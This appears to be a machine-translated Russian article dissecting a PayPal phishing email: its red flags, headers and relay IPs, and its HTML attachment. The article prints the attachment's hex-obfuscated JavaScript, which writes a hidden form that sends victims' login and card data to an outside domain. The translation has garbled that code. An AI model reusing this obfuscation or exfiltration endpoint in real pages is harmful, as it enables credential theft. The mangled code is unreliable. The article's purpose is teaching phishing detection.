Домашняя » как » Интернет-безопасность ломает анатомию фишинга

    Интернет-безопасность ломает анатомию фишинга


    В современном мире, где вся информация доступна онлайн, фишинг является одной из самых популярных и разрушительных онлайн-атак, потому что вы всегда можете очистить вирус, но если ваши банковские реквизиты украдены, у вас проблемы. Вот разбивка одной такой атаки, которую мы получили.

    Не думайте, что важны только ваши банковские реквизиты: в конце концов, если кто-то получает контроль над входом в ваш аккаунт, он не только знает информацию, содержащуюся в этом аккаунте, но и существует вероятность того, что одна и та же информация для входа может быть использована в различных других Счета. И если они скомпрометируют вашу учетную запись электронной почты, они могут сбросить все остальные ваши пароли.

    Поэтому, в дополнение к сохранению надежных и изменяющихся паролей, вы всегда должны следить за поддельными электронными письмами, маскирующимися под реальные вещи. Хотя большинство попыток фишинга являются любительскими, некоторые достаточно убедительны, поэтому важно понять, как их распознать на поверхности, а также как они работают под капотом..

    Изображение asirap

    Изучение того, что на виду

    Наш пример электронного письма, как и большинство попыток фишинга, «уведомляет» вас об активности в вашей учетной записи PayPal, которая в обычных обстоятельствах вызывает тревогу. Таким образом, призыв к действию состоит в том, чтобы подтвердить / восстановить вашу учетную запись, предоставив практически каждую частную информацию, которую вы можете придумать. Опять же, это довольно формально.

    Хотя, безусловно, есть исключения, почти каждое фишинговое и мошенническое письмо загружается красными флагами непосредственно в самом сообщении. Даже если текст убедителен, вы можете обнаружить много ошибок в теле сообщения, которые указывают, что сообщение не является законным.

    Тело сообщения

    На первый взгляд, это один из лучших фишинговых писем, которые я видел. Там нет орфографических или грамматических ошибок и словосочетания читает в соответствии с тем, что вы могли бы ожидать. Тем не менее, есть несколько красных флажков, которые вы можете увидеть, когда вы будете более внимательно изучать контент.

    • «Paypal» - правильный регистр «PayPal» (заглавная P). Вы можете видеть, что оба варианта используются в сообщении. Компании очень продуманны в отношении своего брендинга, поэтому вряд ли что-то подобное пройдет процесс проверки.
    • «Разрешить ActiveX» - сколько раз вы видели, как законный веб-бизнес размером с Paypal использует собственный компонент, который работает только в одном браузере, особенно когда он поддерживает несколько браузеров? Конечно, где-то там какая-то компания делает это, но это красный флаг.
    • «Надежно». Обратите внимание, что это слово не совпадает с полями остального текста абзаца. Даже если я немного растяну окно, оно не будет правильно перенесено.
    • «Paypal!» - пробел перед восклицательным знаком выглядит неловко. Просто еще одна странность, которую я уверен, не будет в законном электронном письме.
    • «PayPal - Форма обновления учетной записи.pdf.htm». Почему Paypal прикрепляет «PDF», особенно если они могут просто ссылаться на страницу на своем сайте? Кроме того, зачем им пытаться замаскировать файл HTML как PDF? Это самый большой красный флаг из всех.

    Заголовок сообщения

    Когда вы смотрите на заголовок сообщения, появляется пара красных флажков:

    • Адрес отправителя [email protected].
    • Адрес отсутствует. Я не пропустил это, оно просто не является частью стандартного заголовка сообщения. Как правило, компания с вашим именем будет персонализировать вам электронное письмо.

    Вложение

    Когда я открываю вложение, вы сразу видите неправильный макет, так как отсутствует информация о стиле. Опять же, зачем PayPal отправлять по электронной почте HTML-форму, если они могут просто дать вам ссылку на своем сайте??

    Замечания: для этого мы использовали встроенный в Gmail просмотрщик вложений HTML, но мы рекомендуем не открывать вложения от мошенников. Никогда. Когда-либо. Они очень часто содержат эксплойты, которые устанавливают троянские программы на ваш компьютер для кражи информации вашей учетной записи..

    Прокрутив немного больше, вы увидите, что эта форма запрашивает не только нашу регистрационную информацию PayPal, но и информацию о банковских и кредитных картах. Некоторые изображения не работают.

    Очевидно, что эта попытка фишинга преследует все одним махом.

    Техническая разбивка

    Хотя должно быть достаточно ясно, исходя из того, что видно, что это попытка фишинга, теперь мы собираемся разбить техническую структуру письма и посмотреть, что мы можем найти.

    Информация из приложения

    Первое, на что нужно обратить внимание - это HTML-код формы вложения, который представляет данные для поддельного сайта..

    При быстром просмотре источника все ссылки отображаются действительными, так как они указывают на «paypal.com» или «paypalobjects.com», которые являются законными.

    Теперь мы собираемся взглянуть на некоторую базовую информацию, которую Firefox собирает на странице..

    Как вы можете видеть, некоторые изображения извлекаются из доменов «blessedtobe.com», «goodhealthpharmacy.com» и «pic-upload.de» вместо законных доменов PayPal..

    Информация из заголовков писем

    Далее мы рассмотрим необработанные заголовки сообщений электронной почты. Gmail делает это доступным через опцию Показать оригинал в сообщении.

    Просматривая информацию заголовка для исходного сообщения, вы можете увидеть, что это сообщение было составлено с использованием Outlook Express 6. Я сомневаюсь, что в PayPal есть кто-то в штате, который отправляет каждое из этих сообщений вручную через устаревший почтовый клиент.

    Теперь, глядя на информацию о маршрутизации, мы можем увидеть IP-адрес как отправителя, так и ретранслирующего почтового сервера..

    «Пользовательский» IP-адрес является исходным отправителем. Делая быстрый просмотр информации об IP, мы видим, что отправляющий IP находится в Германии.

    И когда мы посмотрим на IP-адрес ретрансляционного почтового сервера (mail.itak.at), мы увидим, что это интернет-провайдер из Австрии. Я сомневаюсь, что PayPal направляет свои электронные письма напрямую через интернет-провайдера из Австрии, когда у них есть огромная ферма серверов, которая может легко справиться с этой задачей..

    Куда идут данные?

    Таким образом, мы четко определили, что это фишинговое письмо, и собрали некоторую информацию о том, откуда пришло сообщение, а как насчет того, куда отправляются ваши данные??

    Чтобы увидеть это, мы должны сначала сохранить вложение HTM, сделать наш рабочий стол и открыть в текстовом редакторе. Прокручивая его, кажется, все в порядке, кроме случаев, когда мы попадаем в подозрительно выглядящий блок Javascript..

    Разбирая полный источник последнего блока Javascript, мы видим:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    вар я, у, х =»3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e»; у =»; для (I = 0; я

    Каждый раз, когда вы видите большую беспорядочную строку букв, на первый взгляд, случайных букв и цифр, встроенных в блок Javascript, это обычно что-то подозрительное. Глядя на код, переменная «x» устанавливается в эту большую строку, а затем декодируется в переменную «y». Окончательный результат переменной «y» затем записывается в документ как HTML.

    Поскольку большая строка состоит из чисел 0-9 и букв a-f, она, скорее всего, кодируется посредством простого преобразования ASCII в шестнадцатеричное:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Переводится на:

    Это не совпадение, что это декодирует в действительный тег формы HTML, который отправляет результаты не в PayPal, а на мошеннический сайт.

    Кроме того, когда вы просматриваете исходный HTML-код формы, вы увидите, что этот тег формы невидим, поскольку он генерируется динамически с помощью Javascript. Это умный способ скрыть, что на самом деле делает HTML, если бы кто-то просто просматривал сгенерированный источник вложения (как мы делали ранее), а не открывал вложение непосредственно в текстовом редакторе..

    Запустив короткий сайт на оскорбительном сайте, мы видим, что это домен, размещенный на популярном веб-хосте 1and1..

    Что выделяется, так это то, что домен использует читаемое имя (в отличие от чего-то вроде «dfh3sjhskjhw.net»), и домен зарегистрирован в течение 4 лет. Из-за этого я считаю, что этот домен был захвачен и использовался в качестве пешки в этой попытке фишинга.

    Цинизм - хорошая защита

    Когда речь идет о том, чтобы оставаться в безопасности в Интернете, никогда не повредит хорошему цинизму.

    Хотя я уверен, что в приведенном выше электронном письме больше красных флажков, выше мы указали индикаторы, которые мы увидели всего через несколько минут изучения. Гипотетически, если бы поверхностный уровень электронного письма имитировал его законного коллегу на 100%, технический анализ все равно выявил бы его истинную природу. Вот почему важно иметь возможность изучать то, что вы можете и не можете видеть.